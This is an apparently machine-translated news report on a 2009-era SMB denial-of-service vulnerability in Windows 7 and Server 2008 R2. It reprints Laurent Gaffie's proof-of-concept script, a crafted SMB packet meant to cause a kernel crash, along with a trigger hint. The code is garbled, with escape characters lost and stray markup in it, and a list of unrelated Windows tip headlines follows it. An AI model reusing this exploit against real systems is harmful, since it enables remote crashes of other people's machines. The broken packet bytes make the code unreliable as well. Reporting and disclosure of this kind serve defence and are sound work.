Microsoft confirmed yesterday that there are reports that there is a vulnerability in Windows7 and WindowsServer2008R2 that can be used to remotely attack the system and cause the system kernel to crash. Microsoft is currently on this issue. Conduct an investigation.
An official Microsoft spokesperson said the vulnerability is a denial-of-service vulnerability in the Windows network file and print-sharing protocol ServerMessageBlock (SMB), but so far Microsoft has not found any cases of exploiting this vulnerability.
Security expert LaurentGaffie exposed the vulnerability in a blog yesterday and rated it as a medium-to-high-level vulnerability. LaurentGaffie said the vulnerability would cause the SMB protocol to enter an infinite loop, and he also performed a full code demonstration. There are currently no patches to fix this vulnerability, and Gaffie recommends that users turn off SMB features and ports before Microsoft releases the patch.
Gaffie pointed out that no matter how your firewall is set up, hackers can attack your system on the LAN or using IE. According to Gaffie, the vulnerability only affects Windows 7 and Windows Server 2008 R2 and does not affect other systems.
Code Show:
#win7-crash.py:
#Trigger a remote kernel crash on Win7 andserver2008R2(infiniteloop)
#Crash inKeAccumulateTicks ()duetoNT_ASSERT()/DbgRaiseAssertionFailure()caused byan#infiniteloop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from thetarget:\\this_t_ip_addrBLAH, instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = x00x00x00x9a # > length should be9enot9a..
xfex53x4dx42x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 br>
x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x41x00x01x00x02x02x00x00x30x82xa4x11xe3x12x23x41
xaax4bxadx99xfdx52x31x8dx01x00x00x00x00x00x01x00
x00x00x01x00x00x00x01x00xcfx73x67x74x62x60xcax01
xcbx51xe0x19x62x60xcax01x80x00x 1ex00x20x4cx4dx20
x60x1cx06x06x2bx06x01x05x05x02xa0x12x30x10xa0x0e
x30x0cx06x0ax2bx06x01x04x01x82x37x02x02x0a
According to foreign media reports, although Microsoft has on April 14, 2009 deadline for Windows XP
Windows 7 showed a lot of new features on PDC 2008, but there was a very interesting and practical o
After installing the graphics card driver, you will leave several menus when you right-click on the
Super Taskbar Although the taskbar is still called the taskbar in Windows 7, but because of its new
Clever use of the secret module God Mode
Windows7 system how to check the recent use of the computer
Win7 system camera correctly open mode
Win7 64-bit computer has no sound, reloading the sound card, no use, how to do
Win7 system installed what browser is easy to use
Windows7 Top Ten Taboo Service Introduction
Learn about Windows 7 system security mode
What should I do if the Win7 hard drive is always turned off automatically?
Win7 how to install 3DMAX can not start after the completion of the solution
How to completely remove the stubborn files of the program under the win7 system
How to completely shield the multi-user login method in Win7 system
Window xp novice guide: the new use of large memory
Windows? NT? 4.0? Remote Registry Denial of Service Attack Vulnerability
Windows system shortcuts finishing
Tips for creating Windows 8 Start Menu by hand
GZIP conflict caused PHP file error 330 (net::ERR
A good way to keep your computer from sleeping
How to update the graphics card driver under Win7
Win8 taskbar starts without shutting down the computer solution
Share Microsoft Windows 7 skills to change the Wi-Fi base station